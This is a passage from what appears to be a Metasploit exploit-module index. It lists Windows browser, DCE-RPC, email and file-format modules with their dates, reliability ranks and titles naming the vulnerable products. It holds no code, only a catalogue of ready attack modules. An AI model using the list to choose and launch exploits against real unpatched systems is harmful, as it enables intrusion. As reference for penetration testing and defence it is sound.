GUI ActiveX Control Buffer Overflow + windows/browser/exodus 2018-01-25 manual No Exodus Wallet (ElectronJS Framework) remote Code Execution + windows/browser/facebook_extractiptc 2008-01-31 normal No Facebook Photo Uploader 4 ActiveX Control Buffer Overflow + windows/browser/firefox_smil_uaf 2016-11-30 normal No Firefox nsSMILTimeContainer::NotifyTimeChange() RCE + windows/browser/foxit_reader_plugin_url_bof 2013-01-07 normal No Foxit Reader Plugin URL Processing Buffer Overflow + windows/browser/getgodm_http_response_bof 2014-03-09 normal No GetGo Download Manager HTTP Response Buffer Overflow + windows/browser/gom_openurl 2007-10-27 normal No GOM Player ActiveX Control Buffer Overflow + windows/browser/greendam_url 2009-06-11 normal No Green Dam URL Processing Buffer Overflow + windows/browser/honeywell_hscremotedeploy_exec 2013-02-22 excellent No Honeywell HSC Remote Deployer ActiveX Remote Code Execution + windows/browser/honeywell_tema_exec 2011-10-20 excellent No Honeywell Tema Remote Installer ActiveX Remote Code Execution + windows/browser/hp_alm_xgo_setshapenodetype_exec 2012-08-29 normal No HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution + windows/browser/hp_easy_printer_care_xmlcachemgr 2012-01-11 great No HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution + windows/browser/hp_easy_printer_care_xmlsimpleaccessor 2011-08-16 great No HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution + windows/browser/hp_loadrunner_addfile 2008-01-25 normal No Persits XUpload ActiveX AddFile Buffer Overflow + windows/browser/hp_loadrunner_addfolder 2007-12-25 good No HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow + windows/browser/hp_loadrunner_writefilebinary 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX Remote Code Execution + windows/browser/hp_loadrunner_writefilestring 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution + windows/browser/hpmqc_progcolor 2007-04-04 normal No HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow + windows/browser/hyleos_chemviewx_activex 2010-02-10 good No Hyleos ChemView ActiveX Control Stack Buffer Overflow + windows/browser/ibm_spss_c1sizer 2013-04-26 normal No IBM SPSS SamplePower C1Tab ActiveX Heap Overflow + windows/browser/ibm_tivoli_pme_activex_bof 2012-03-01 normal No IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow + windows/browser/ibmegath_getxmlvalue 2009-03-24 normal No IBM Access Support ActiveX Control Buffer Overflow + windows/browser/ibmlotusdomino_dwa_uploadmodule 2007-12-20 normal No IBM Lotus Domino Web Access Upload Module Buffer Overflow + windows/browser/ie_cbutton_uaf 2012-12-27 normal No MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability + windows/browser/ie_cgenericelement_uaf 2013-05-03 good No MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability + windows/browser/ie_createobject 2006-04-11 excellent No MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution + windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability + windows/browser/ie_iscomponentinstalled 2006-02-24 normal No Microsoft Internet Explorer isComponentInstalled Overflow + windows/browser/ie_setmousecapture_uaf 2013-09-17 normal No MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free + windows/browser/ie_unsafe_scripting 2010-09-20 manual No Microsoft Internet Explorer Unsafe Scripting Misconfiguration + windows/browser/imgeviewer_tifmergemultifiles 2010-03-03 normal No Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control + windows/browser/indusoft_issymbol_internationalseparator 2012-04-28 normal No InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow + windows/browser/inotes_dwa85w_bof 2012-06-01 normal No IBM Lotus iNotes dwa85W ActiveX Buffer Overflow + windows/browser/intrust_annotatex_add 2012-03-28 average No Quest InTrust Annotation Objects Uninitialized Pointer + windows/browser/java_basicservice_impl 2010-10-12 excellent No Sun Java Web Start BasicServiceImpl Code Execution + windows/browser/java_cmm 2013-03-01 normal No Java CMM Remote Code Execution + windows/browser/java_codebase_trust 2011-02-15 excellent No Sun Java Applet2ClassLoader Remote Code Execution + windows/browser/java_docbase_bof 2010-10-12 great No Sun Java Runtime New Plugin docbase Buffer Overflow + windows/browser/java_mixer_sequencer 2010-03-30 great No Java MixerSequencer Object GM_Song Structure Handling Vulnerability + windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection + windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection + windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection + windows/browser/juniper_sslvpn_ive_setupdll 2006-04-26 normal No Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow + windows/browser/kazaa_altnet_heap 2007-10-03 normal No Kazaa Altnet Download Manager ActiveX Control Buffer Overflow + windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability + windows/browser/logitechvideocall_start 2007-05-31 normal No Logitech VideoCall ActiveX Control Buffer Overflow + windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow + windows/browser/macrovision_downloadandexecute 2007-10-31 normal No Macrovision InstallShield Update Service Buffer Overflow + windows/browser/macrovision_unsafe 2007-10-20 excellent No Macrovision InstallShield Update Service ActiveX Unsafe Method + windows/browser/malwarebytes_update_exec 2014-12-16 good No Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution + windows/browser/maxthon_history_xcs 2012-11-26 excellent No Maxthon3 about:history XCS Trusted Zone Code Execution + windows/browser/mcafee_mcsubmgr_vsprintf 2006-08-01 normal No McAfee Subscription Manager Stack Buffer Overflow + windows/browser/mcafee_mvt_exec 2012-04-30 excellent No McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability + windows/browser/mcafeevisualtrace_tracetarget 2007-07-07 normal No McAfee Visual Trace ActiveX Control Buffer Overflow + windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow + windows/browser/mozilla_attribchildremoved 2011-12-06 average No Firefox 8/9 AttributeChildRemoved() Use-After-Free + windows/browser/mozilla_firefox_onreadystatechange 2013-06-25 normal No Firefox onreadystatechange Event DocumentViewerImpl Use After Free + windows/browser/mozilla_firefox_xmlserializer 2013-01-08 normal No Firefox XMLSerializer Use After Free + windows/browser/mozilla_interleaved_write 2010-10-25 normal No Mozilla Firefox Interleaved document.write/appendChild Memory Corruption + windows/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability + windows/browser/mozilla_nssvgvalue 2011-12-06 average No Firefox nsSVGValue Out-of-Bounds Access Vulnerability + windows/browser/mozilla_nstreerange 2011-02-02 normal No Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability + windows/browser/mozilla_reduceright 2011-06-21 normal No Mozilla Firefox Array.reduceRight() Integer Overflow + windows/browser/ms03_020_ie_objecttype 2003-06-04 normal No MS03-020 Microsoft Internet Explorer Object Type + windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution + windows/browser/ms06_001_wmf_setabortproc 2005-12-27 great No Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution + windows/browser/ms06_013_createtextrange 2006-03-19 normal No MS06-013 Microsoft Internet Explorer createTextRange() Code Execution + windows/browser/ms06_055_vml_method 2006-09-19 normal No MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution + windows/browser/ms06_057_webview_setslice 2006-07-17 normal No MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow + windows/browser/ms06_067_keyframe 2006-11-14 normal No MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability + windows/browser/ms06_071_xml_core 2006-10-10 normal No MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling + windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) + windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download + windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow + windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow + windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption + windows/browser/ms09_002_memory_corruption 2009-02-10 normal No MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption + windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal No Microsoft OWC Spreadsheet HTMLURL Buffer Overflow + windows/browser/ms09_043_owc_msdso 2009-07-13 normal No Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption + windows/browser/ms09_072_style_object 2009-11-20 normal No MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption + windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption + windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free + windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free + windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good No MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption + windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution + windows/browser/ms10_026_avi_nsamplespersec 2010-04-13 normal No MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow + windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution + windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution + windows/browser/ms10_090_ie_css_clip 2010-11-03 good No MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption + windows/browser/ms11_003_ie_css_import 2010-11-29 good No MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free + windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal No MS11-050 IE mshtml!CObjectElement Use After Free + windows/browser/ms11_081_option 2012-10-11 normal No MS11-081 Microsoft Internet Explorer Option Element Use-After-Free + windows/browser/ms11_093_ole32 2011-12-13 normal No MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution + windows/browser/ms12_004_midi 2012-01-10 normal No MS12-004 midiOutPlayNextPolyEvent Heap Overflow + windows/browser/ms12_037_ie_colspan 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow + windows/browser/ms12_037_same_id 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption + windows/browser/ms13_009_ie_slayoutrun_uaf 2013-02-13 average No MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free + windows/browser/ms13_022_silverlight_script_object 2013-03-12 normal No MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access + windows/browser/ms13_037_svg_dashstyle 2013-03-06 normal No MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow + windows/browser/ms13_055_canchor 2013-07-09 normal No MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free + windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal No MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free + windows/browser/ms13_069_caret 2013-09-10 normal No MS13-069 Microsoft Internet Explorer CCaret Use-After-Free + windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free + windows/browser/ms13_090_cardspacesigninhelper 2013-11-08 normal No MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow + windows/browser/ms14_012_cmarkup_uaf 2014-02-13 normal No MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free + windows/browser/ms14_012_textrange 2014-03-11 normal No MS14-012 Microsoft Internet Explorer TextRange Use-After-Free + windows/browser/ms14_064_ole_code_execution 2014-11-13 good No MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution + windows/browser/ms16_051_vbscript 2016-05-10 normal No Internet Explorer 11 VBScript Engine Memory Corruption + windows/browser/msvidctl_mpeg2 2009-07-05 normal No Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption + windows/browser/mswhale_checkforupdates 2009-04-15 normal No Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow + windows/browser/msxml_get_definition_code_exec 2012-06-12 good No MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption + windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal No NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow + windows/browser/nis2004_antispam 2004-03-19 normal No Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow + windows/browser/nis2004_get 2007-05-16 normal No Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow + windows/browser/notes_handler_cmdinject 2012-06-18 excellent No IBM Lotus Notes Client URL Handler Command Injection + windows/browser/novell_groupwise_gwcls1_actvx 2013-01-30 normal No Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution + windows/browser/novelliprint_callbackurl 2010-08-20 normal No Novell iPrint Client ActiveX Control call-back-url Buffer Overflow + windows/browser/novelliprint_datetime 2009-12-08 great No Novell iPrint Client ActiveX Control Date/Time Buffer Overflow + windows/browser/novelliprint_executerequest 2008-02-22 normal No Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow + windows/browser/novelliprint_executerequest_dbg 2010-08-04 normal No Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow + windows/browser/novelliprint_getdriversettings 2008-06-16 normal No Novell iPrint Client ActiveX Control Buffer Overflow + windows/browser/novelliprint_getdriversettings_2 2010-11-15 normal No Novell iPrint Client ActiveX Control Buffer Overflow + windows/browser/novelliprint_target_frame 2009-12-08 great No Novell iPrint Client ActiveX Control target-frame Buffer Overflow + windows/browser/ntr_activex_check_bof 2012-01-11 normal No NTR ActiveX Control Check() Method Buffer Overflow + windows/browser/ntr_activex_stopmodule 2012-01-11 normal No NTR ActiveX Control StopModule() Remote Code Execution + windows/browser/oracle_autovue_setmarkupmode 2012-04-18 normal No Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow + windows/browser/oracle_dc_submittoexpress 2009-08-28 normal No Oracle Document Capture 10g ActiveX Control Buffer Overflow + windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution + windows/browser/orbit_connecting 2009-02-03 normal No Orbit Downloader Connecting Log Creation Buffer Overflow + windows/browser/ovftool_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability + windows/browser/pcvue_func 2011-10-05 average No PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability + windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal + windows/browser/quickr_qp2_bof 2012-05-23 normal No IBM Lotus QuickR qp2 ActiveX Buffer Overflow + windows/browser/real_arcade_installerdlg 2011-04-03 normal No Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution + windows/browser/realplayer_cdda_uri 2010-11-15 normal No RealNetworks RealPlayer CDDA URI Initialization Vulnerability + windows/browser/realplayer_console 2008-03-08 normal No RealPlayer rmoc3260.dll ActiveX Control Heap Corruption + windows/browser/realplayer_import 2007-10-18 normal No RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow + windows/browser/realplayer_qcp 2011-08-16 average No RealNetworks Realplayer QCP Parsing Heap Overflow + windows/browser/realplayer_smil 2005-03-01 normal No RealNetworks RealPlayer SMIL Buffer Overflow + windows/browser/roxio_cineplayer 2007-04-11 normal No Roxio CinePlayer ActiveX Control Buffer Overflow + windows/browser/safari_xslt_output 2011-07-20 excellent No Apple Safari Webkit libxslt Arbitrary File Creation + windows/browser/samsung_neti_wiewer_backuptoavi_bof 2012-04-21 normal No Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow + windows/browser/samsung_security_manager_put 2016-08-05 excellent No Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution + windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal No SAP AG SAPgui EAI WebViewer3D Buffer Overflow + windows/browser/siemens_solid_edge_selistctrlx 2013-05-26 normal No Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution + windows/browser/softartisans_getdrivename 2008-08-25 normal No SoftArtisans XFile FileManager ActiveX Control Buffer Overflow + windows/browser/sonicwall_addrouteentry 2007-11-01 normal No SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow + windows/browser/symantec_altirisdeployment_downloadandinstall 2009-09-09 excellent No Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute + windows/browser/symantec_altirisdeployment_runcmd 2009-11-04 normal No Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow + windows/browser/symantec_appstream_unsafe 2009-01-15 excellent No Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute + windows/browser/symantec_backupexec_pvcalendar 2008-02-28 normal No Symantec BackupExec Calendar Control Buffer Overflow + windows/browser/symantec_consoleutilities_browseandsavefile 2009-11-02 normal No Symantec ConsoleUtilities ActiveX Control Buffer Overflow + windows/browser/synactis_connecttosynactis_bof 2013-05-30 normal No Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow + windows/browser/systemrequirementslab_unsafe 2008-10-16 excellent No Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method + windows/browser/teechart_pro 2011-08-11 normal No TeeChart Professional ActiveX Control Trusted Integer Dereference + windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal No Tom Sawyer Software GET Extension Factory Remote Code Execution + windows/browser/trendmicro_extsetowner 2010-08-25 normal No Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution + windows/browser/trendmicro_officescan 2007-02-12 normal No Trend Micro OfficeScan Client ActiveX Control Buffer Overflow + windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow + windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution + windows/browser/ultramjcam_openfiledig_bof 2012-03-28 normal No TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow + windows/browser/ultraoffice_httpupload 2008-08-27 good No Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow + windows/browser/verypdf_pdfview 2008-06-16 normal No VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow + windows/browser/viscom_movieplayer_drawtext 2010-01-12 normal No Viscom Software Movie Player Pro SDK ActiveX 6.8 + windows/browser/vlc_amv 2011-03-23 good No VLC AMV Dangling Pointer Vulnerability + windows/browser/vlc_mms_bof 2012-03-15 normal No VLC MMS Stream Handling Buffer Overflow + windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker + windows/browser/webex_ucf_newobject 2008-08-06 good No WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow + windows/browser/wellintech_kingscada_kxclientdownload 2014-01-14 good No KingScada kxClientDownload.ocx ActiveX Remote Code Execution + windows/browser/winamp_playlist_unc 2006-01-29 great No Winamp Playlist UNC Path Computer Name Overflow + windows/browser/winamp_ultravox 2008-01-18 normal No Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow + windows/browser/windvd7_applicationtype 2007-03-20 normal No WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow + windows/browser/winzip_fileview 2007-11-02 normal No WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow + windows/browser/wmi_admintools 2010-12-21 great No Microsoft WMI Administration Tools ActiveX Buffer Overflow + windows/browser/x360_video_player_set_text_bof 2015-01-30 normal No X360 VideoPlayer ActiveX Control Buffer Overflow + windows/browser/xmplay_asx 2006-11-21 good No XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow + windows/browser/yahoomessenger_fvcom 2007-08-30 normal No Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow + windows/browser/yahoomessenger_server 2007-06-05 good No Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow + windows/browser/zenturiprogramchecker_unsafe 2007-05-29 excellent No Zenturi ProgramChecker ActiveX Control Arbitrary File Download + windows/browser/zenworks_helplauncher_exec 2011-10-19 normal No AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution + windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow + windows/dcerpc/ms05_017_msmq 2005-04-12 good No MS05-017 Microsoft Message Queueing Service Path Overflow + windows/dcerpc/ms07_029_msdns_zonename 2007-04-12 great No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) + windows/dcerpc/ms07_065_msmq 2007-12-11 good No MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow + windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) + windows/email/ms10_045_outlook_ref_only 2010-06-01 excellent No Outlook ATTACH_BY_REF_ONLY File Execution + windows/email/ms10_045_outlook_ref_resolve 2010-06-01 excellent No Outlook ATTACH_BY_REF_RESOLVE File Execution + windows/emc/alphastor_agent 2008-05-27 great No EMC AlphaStor Agent Buffer Overflow + windows/emc/alphastor_device_manager_exec 2013-01-18 excellent Yes EMC AlphaStor Device Manager Opcode 0x75 Command Injection + windows/emc/networker_format_string 2012-08-29 normal No EMC Networker Format String + windows/emc/replication_manager_exec 2011-02-07 great No EMC Replication Manager Command Execution + windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow + windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow + windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File id Parameter Overflow + windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow + windows/fileformat/actfax_import_users_bof 2012-08-28 normal No ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow + windows/fileformat/activepdf_webgrabber 2008-08-26 low No activePDF WebGrabber ActiveX Control Buffer Overflow + windows/fileformat/adobe_collectemailinfo 2008-02-08 good No Adobe Collab.collectEmailInfo() Buffer Overflow + windows/fileformat/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow + windows/fileformat/adobe_flashplayer_button 2010-10-28 normal No Adobe Flash Player "Button" Remote Code Execution + windows/fileformat/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use + windows/fileformat/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow + windows/fileformat/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow + windows/fileformat/adobe_illustrator_v14_eps 2009-12-03 great No Adobe Illustrator CS4 v14.0.0 + windows/fileformat/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Memory Corruption + windows/fileformat/adobe_libtiff 2010-02-16 good No Adobe Acrobat Bundled LibTIFF Integer Overflow + windows/fileformat/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability + windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent No Adobe PDF Embedded EXE Social Engineering + windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript) + windows/fileformat/adobe_reader_u3d 2011-12-06 average No Adobe Reader U3D Memory Corruption Vulnerability + windows/fileformat/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free + windows/fileformat/adobe_u3d_meshdecl 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun + windows/fileformat/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow + windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow + windows/fileformat/altap_salamander_pdb 2007-06-19 good No Altap Salamander 2.5 PE Viewer Buffer Overflow + windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow + windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow + windows/fileformat/apple_quicktime_pnsize 2011-08-08 good No Apple QuickTime PICT PnSize Buffer Overflow + windows/fileformat/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow + windows/fileformat/apple_quicktime_texml 2012-05-15 normal No Apple QuickTime TeXML Style Element Stack Buffer Overflow + windows/fileformat/audio_coder_m3u 2013-05-01 normal No AudioCoder .M3U Buffer Overflow + windows/fileformat/audio_wkstn_pls 2009-12-08 good No Audio Workstation 6.4.2.4.3 pls Buffer Overflow + windows/fileformat/audiotran_pls 2010-01-09 good No Audiotran 1.4.1 (PLS File) Stack Buffer Overflow + windows/fileformat/audiotran_pls_1424 2010-09-09 good No Audiotran PLS File Stack Buffer Overflow + windows/fileformat/aviosoft_plf_buf 2011-11-09 good No Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow + windows/fileformat/bacnet_csv 2010-09-16 good No BACnet OPC Client Buffer Overflow + windows/fileformat/beetel_netconfig_ini_bof 2013-10-12 normal No Beetel Connection Manager NetConfig.ini Buffer Overflow + windows/fileformat/blazedvd_hdtv_bof 2012-04-03 normal No BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability + windows/fileformat/blazedvd_plf 2009-08-03 good No BlazeDVD 6.1 PLF Buffer Overflow + windows/fileformat/boxoft_wav_to_mp3 2015-08-31 normal No Boxoft WAV to MP3 Converter v1.1 Buffer Overflow + windows/fileformat/bpftp_client_bps_bof 2014-07-24 normal No BulletProof FTP Client BPS Buffer Overflow + windows/fileformat/bsplayer_m3u 2010-01-07 normal No BS.Player 2.57 Buffer Overflow (Unicode SEH) + windows/fileformat/ca_cab 2007-06-05 good No CA Antivirus Engine CAB Buffer Overflow + windows/fileformat/cain_abel_4918_rdp 2008-11-30 good No Cain and Abel RDP Buffer Overflow + windows/fileformat/ccmplayer_m3u_bof 2011-11-30 good No CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow + windows/fileformat/chasys_draw_ies_bmp_bof 2013-07-26 normal No Chasys Draw IES Buffer Overflow + windows/fileformat/coolpdf_image_stream_bof 2013-01-18 normal No Cool PDF Image Stream Buffer Overflow + windows/fileformat/corelpdf_fusion_bof 2013-07-08 normal No Corel PDF Fusion Stack Buffer Overflow + windows/fileformat/csound_getnum_bof 2012-02-23 normal No Csound hetro File Handling Stack Buffer Overflow + windows/fileformat/cutezip_bof 2011-02-12 normal No GlobalSCAPE CuteZIP Stack Buffer Overflow + windows/fileformat/cve_2017_8464_lnk_rce 2017-06-13 excellent No LNK Code Execution Vulnerability + windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal No CyberLink LabelPrint 2.5 Stack Buffer Overflow + windows/fileformat/cyberlink_p2g_bof 2011-09-12 great No CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit + windows/fileformat/cytel_studio_cy3 2011-10-02 good No Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow + windows/fileformat/deepburner_path 2006-12-19 great No AstonSoft DeepBurner (DBR File) Path Buffer Overflow + windows/fileformat/destinymediaplayer16 2009-01-03 good No Destiny Media Player 1.61 PLS M3U Buffer Overflow + windows/fileformat/digital_music_pad_pls 2010-09-17 normal No Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow + windows/fileformat/djstudio_pls_bof 2009-12-30 normal No DJ Studio Pro 5.1 .pls Stack Buffer Overflow + windows/fileformat/djvu_imageurl 2008-10-30 low No DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow + windows/fileformat/dupscout_xml 2017-03-29 normal No Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow + windows/fileformat/dvdx_plf_bof 2007-06-02 normal No DVD X Player 5.5 .plf PlayList Buffer Overflow + windows/fileformat/easycdda_pls_bof 2010-06-07 normal No Easy CD-DA Recorder PLS Buffer Overflow + windows/fileformat/emc_appextender_keyworks 2009-09-29 average No EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow + windows/fileformat/erdas_er_viewer_bof 2013-04-23 normal No ERS Viewer 2011 ERS File Handling Buffer Overflow + windows/fileformat/erdas_er_viewer_rf_report_error 2013-05-23 normal No ERS Viewer 2013 ERS File Handling Buffer Overflow + windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow in QUO + windows/fileformat/etrust_pestscan 2009-11-02 average No CA eTrust PestPatrol ActiveX Control Buffer 